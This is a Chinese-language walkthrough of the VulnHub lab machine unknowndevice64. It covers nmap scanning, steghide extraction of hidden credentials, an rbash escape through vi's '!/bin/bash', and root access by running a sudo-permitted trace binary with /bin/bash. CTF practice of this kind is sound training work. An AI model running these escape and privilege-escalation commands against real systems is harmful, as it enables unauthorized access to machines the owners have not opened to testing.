一、靶机下载地址
https://www.vulnhub.com/entry/unknowndevice64-1,293/
二、信息收集
1、主机发现
# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 "00:0C:29:20:5D:6F"
2、端口扫描
# 使用命令
nmap 192.168.145.205 -p- -sV
3、指纹识别
# 使用命令
whatweb 192.168.145.205:31337
4、目录扫描,没什么发现
# 使用命令
dirsearch -u "http://192.168.145.205:31337"
dirb http://192.168.145.205:31337
三、获取shell
1、访问靶机IP地址192.168.145.205:31337
2、右击查看页面源码,发现有一个图片 key_is_h1dd3n.jpg
3、访问图片,上面写着 隐藏的秘密,可能是图片隐写
4、将图片下载下来,在kali中使用 steghide 工具提取信息,但是需要密码,根据名字可以知道密码为 h1dd3n
# 使用命令
steghide extract -sf key_is_h1dd3n.jpg
5、查看h1dd3n.txt文件的内容,发现是brainfuck
加密
# 使用命令
cat h1dd3n.txt
6、使用BerylEnigma
工具解密,得到账号密码ud64:1M!#64@UD
7、使用ssh进行远程连接
# 使用命令
ssh ud64@192.168.145.205 -p 1337
8、发现很多命令被限制,是rbash的shell,双击tab键,查看可执行命令
9、发现vi 和 export 命令可用,vi 绕过,还是有部分命令无法执行
# 使用命令
vi
按shift+:
!/bin/bash
10、配置环境变量
# 使用命令
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
四、提权
1、输入sudo -l命令查看当前
2、sysud64 可以执行 root 权限的命令,直接尝试提权,但是失败了
# 使用命令
sudo sysud64
3、输入sysud64 -h
查看帮助,发现可以使用-o参数
# 使用命令
sudo sysud64 -h
-o file send trace output to FILE instead of stderr
4、尝试提权,提权成功
# 使用命令
sudo sysud64 -o /dev/null /bin/bash